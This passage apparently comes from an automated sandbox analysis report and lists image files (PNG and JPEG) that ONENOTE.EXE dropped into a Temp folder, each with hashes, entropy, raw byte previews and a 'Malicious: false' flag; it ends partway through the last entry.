Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....\|;..gy+.[..,...o...p..2.%..B.Y....\|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M\|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+*.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..\|.l{..72.....zv@.#.<.........../....F\|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

C:\Users\user\AppData\Local\Temp\{84F6E3DC-C434-43E8-A7BA-495CFB4C90EA}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2210
Entropy (8bit):	7.86853667196985
Encrypted:	false
SSDEEP:	48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
MD5:	73E38124F94AD20A2F1571FBBE11AEEC
SHA1:	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
SHA-256:	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
SHA-512:	320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
Malicious:	false
Preview:	.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1\|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B\|CW......sO..\.=..&3...,.

C:\Users\user\AppData\Local\Temp\{85E39A17-B6C7-4F0B-889B-628F6646B82A}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13737
Entropy (8bit):	7.916899917415529
Encrypted:	false
SSDEEP:	384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
MD5:	830632032C7DDBCCDE126F4BAE935540
SHA1:	9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
SHA-256:	2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
SHA-512:	5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
Malicious:	false
Preview:	.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

C:\Users\user\AppData\Local\Temp\{86A1B48C-AC03-4644-97D8-B27AAD9586C8}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11449
Entropy (8bit):	7.91552812501629
Encrypted:	false
SSDEEP:	192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
MD5:	163E6791C87E4999C343EC5E23843B15
SHA1:	43CE3BAE19E22876483A7FD0E93DB45790373600
SHA-256:	DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
SHA-512:	98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....\|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E\|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.\|..\|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

C:\Users\user\AppData\Local\Temp\{86BF35B8-4BE4-41EE-B56B-139A77416967}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 177 x 123, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	65589
Entropy (8bit):	7.960181939300061
Encrypted:	false
SSDEEP:	1536:2Hlrjw3xL//DPgff+9j6yPWvHMHjkbfnwHO3AW3GL:2H2zDUU+yPVHITwNfL
MD5:	8B48DA9F89264D14B83FF9969F869577
SHA1:	E1BD58E2D80FEEF56DC514F3F0B3AB9669F22F95
SHA-256:	62AD3C277E54F03F1ADB44062407346F789E63859B7AFABFD64BE6AF5E9F66EC
SHA-512:	03B783EC968DF3F648504D068D64DD1AE110E28110FE5B3401C9D04F44897DBE0CBB5680D42CA4C665FA94A6CED4B559106EB3C06C9BF2C5B14951ECBFFAC8AE
Malicious:	false
Preview:	.PNG........IHDR.......{.....;Za.....sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..Y=.+I....t.y...,^vv....;. "\|. .i7.....$.2g..']pH@p..]b....H.H.......d'@ B...U.xm..3{3k?..5n.._}U...3......~..>...g.....f..t...t:...p>..Si..d:..k:.Lf..t6.K.i....d<...x.8\.8.+lc...)i.$.r.....x.t.BG.R.cm.c...p.:&.6.4..K.......^...~b].0....oBYv..u.'.=.K.Q.g)6.....4.!.M......4.=....G.%.Sr........nxC.F..t.U........1...J.t..eQ....".... \|...81.$D.!.>...........$...^.vY..EY8tb..'.P.g#O....S..0'.V....x.W..........k.......s.C.S...J%.iVb..].........3....j.}.z....+.s..@..K.....\x.C..e.Qq.....;N.....;....,....^...$F..{G...8.#....8'..&....8..5.....3(P._....S......\|".....u.cr....+a-....&V..x...iI-<\|a.{E.c.X.......?..&.C....'........(.x....>...M.?.9..#X......l...0...Z.F..<.z.0}Q..Z1..........?h..`E$K.2o.Ac^.........D..uL=.}.#0.. M!.A.C......\|_..(.Y........!E... .O...`;....M+..x.u~g...q>...N."D^..K..x..D.`.!.

C:\Users\user\AppData\Local\Temp\{86D6C1FF-3FA4-4ECE-B327-AC402FCC6396}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14458
Entropy (8bit):	7.944094738048628
Encrypted:	false
SSDEEP:	384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
MD5:	7CEB71F78A193F8C9F7FFDA5F81AEBD8
SHA1:	EEC1597705EFF1A527C246B86A71878185BA6B1B
SHA-256:	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
SHA-512:	1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
Malicious:	false
Preview:	.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...dU...C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

C:\Users\user\AppData\Local\Temp\{87687ADB-B4EC-4905-887E-6140F31F5150}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13084
Entropy (8bit):	7.940058639272698
Encrypted:	false
SSDEEP:	384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
MD5:	0693DABBBC411538D209F32E22F622F6
SHA1:	FB7E675406FA123CDB7E058D336742D6A2E8DC8E
SHA-256:	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
SHA-512:	F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
Malicious:	false
Preview:	.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u..........OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................),...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....\|r1

C:\Users\user\AppData\Local\Temp\{87E4821C-5419-4904-863F-FA1878691DC9}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11449
Entropy (8bit):	7.91552812501629
Encrypted:	false
SSDEEP:	192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
MD5:	163E6791C87E4999C343EC5E23843B15
SHA1:	43CE3BAE19E22876483A7FD0E93DB45790373600
SHA-256:	DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
SHA-512:	98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....\|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E\|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.\|..\|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

C:\Users\user\AppData\Local\Temp\{88A94005-24CD-4C8C-8E7E-17D7091C5DBF}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1248x1624, components 3
Category:	dropped
Size (bytes):	49224
Entropy (8bit):	7.402134460714453
Encrypted:	false
SSDEEP:	1536:orJJmT4HVnteV4FrdMiYcx7bfCb6HPdnX2:EvSMVnte8ZP1Y6Jm
MD5:	B7FC313714EDD7866F4C76527282C2B5
SHA1:	C86217B46956933FAE4A30483A63B33F34B8C503
SHA-256:	B6D25F5EB52D5C24EF6C325BD25F18E413F3E23D20413A3693749275BA4B192C
SHA-512:	038A73B7A69DD976C964F1538F5B4F7C6C64721E4F2F1A831815598FAAE84CAC53305C03F5CEA6E66ACDC110A9A5117EEE191345EA004B9576C752122F8D88F7
Malicious:	false
Preview:	......Exif..II*.................Ducky.......-.....+http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:CFCF3A6CA8A811EDBBF3936CDCD6FAAD" xmpMM:DocumentID="xmp.did:CFCF3A6DA8A811EDBBF3936CDCD6FAAD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CFCF3A6AA8A811EDBBF3936CDCD6FAAD" stRef:documentID="xmp.did:CFCF3A6BA8A811EDBBF3936CDCD6FAAD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d....................................................... ..,+++,1111111111............................................!!..!!))())

C:\Users\user\AppData\Local\Temp\{89BD946D-A7F4-45B9-AE48-9D7E635AF3F7}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11886
Entropy (8bit):	7.946442244439929
Encrypted:	false
SSDEEP:	192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
MD5:	875CFB3B5C3619253223731E8C9879E5
SHA1:	6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
SHA-256:	CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
SHA-512:	47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s\|.....C.$@.$.....t.!........8......RR....<...6..P\|\|....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O\|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.\|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e.....UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ).(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....\|g..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

C:\Users\user\AppData\Local\Temp\{8A1CB886-96C6-4D47-9F1C-F0CF76E1A553}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4081
Entropy (8bit):	7.943373267196131
Encrypted:	false
SSDEEP:	96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
MD5:	29B87BEEC5D3899824AA390530CD47FB
SHA1:	55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
SHA-256:	F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
SHA-512:	1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
Malicious:	false
Preview:	.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a............k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5....F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.. 8T=/'9,.KDW...GN;0(P3_....1......'.;..;\|.L.a.&<\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._\|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

C:\Users\user\AppData\Local\Temp\{8A3AB389-1D68-454A-9115-66E2536061FC}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	22634
Entropy (8bit):	7.974332204835705
Encrypted:	false
SSDEEP:	384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
MD5:	548D234C9AB4021CA5FAB7BF22502465
SHA1:	2F7495D250DC86EA99473CC342D164B859926021
SHA-256:	7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
SHA-512:	261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
Malicious:	false
Preview:	.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O\|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../\|.O........7_...Oj....\|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[\|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.\|..kv....];j\|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9\|.m.+`).\|......x..vak-].../.....G'....4.>B6$.......-o.q..L;.N+....>...=.!.Y..Q...?......7..,....}

C:\Users\user\AppData\Local\Temp\{8AD97103-A531-410E-8511-EB249E9B45DE}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 813 x 99, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	99293
Entropy (8bit):	7.9690121496708555
Encrypted:	false
SSDEEP:	1536:Moq1jVORV5NO5xLCBaaNk4vhpCr1CH/DATOQlWvHMHojiaAMrxArLFRZPj19AWFz:eVEbouBaIk4T8uDGOQlVHvaAMkhDh95V
MD5:	EA45266A770EEA27A24A5BB3BE688B14
SHA1:	9F0B23B3C8EBA4FC3C521E875EF876FBE018F3C8
SHA-256:	EDAD0F03E6FF99FEF9EF8E8B834CE74F26CD23C5F8C067F5CEE66F304181E64D
SHA-512:	D4EE36BDA897BBD643A699A0332DD00DE9CDCC6F46D861789BAD259A4BF87868AE3B4CFAAB6DFAF29941C7055B77A95D76BAA86A4A0DB2BF3BAF7E3317F03EB9
Malicious:	false
Preview:	.PNG........IHDR...-...c............sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..[Oh\E...y3kv........`.%m.R..6.1.4).o..Ki...D.......P!.].=..K...C[....f.}o7VPJIg...{3.\|....d.....i..=.4.u0...n y......@j..Q..f)..mQ...4-SJ..9.d.?..5\-....:b.W..i...c.5..{..pj#.....B1C/.I.......].Su.k?.2..:.9Q...5.U...UZ...e..U.c],..2.}...1..)W./..Epr.Zt.....K.=..{......e..."...v..B.4.#....A.V1.".V}t..[..2f..Y..V9.".6.......(..gbm.P.....Y%2.c.z.:Q.2.<tYF.....u.@..KJ.;u.q:.].....$.....V....Hqk..DW.l.e.j.Z.YP?:'R...<........6...m@..r..j2..HK"\|..L.Nc..D..y.9..B4$.......`.3.m1LE....7(OU\+./.O...%6T..w......h....).I.&n.........#..W.41...5.#.`..I...<.?.\|..+Q.....#i........$,..n...`.s....[..E. T.w..j.,&-.r..;a....#.>(.P......f...MU\3..;B....)..5....z..(....-...a.....}y.l..E...z>......&..g.$.....*T...N....E:./.>..#...^..E.0..%......(..@..W.X.NDM.<~.]A.>..fW.O.y.'...Z...h..).F..

C:\Users\user\AppData\Local\Temp\{8B1DD6CA-047D-4E1C-9686-804B2FEE767B}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{8B74521F-6A5E-4FA4-BC72-56EE454B2E5B}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:26:15], progressive, precision 8, 216x792, components 3
Category:	dropped
Size (bytes):	64118
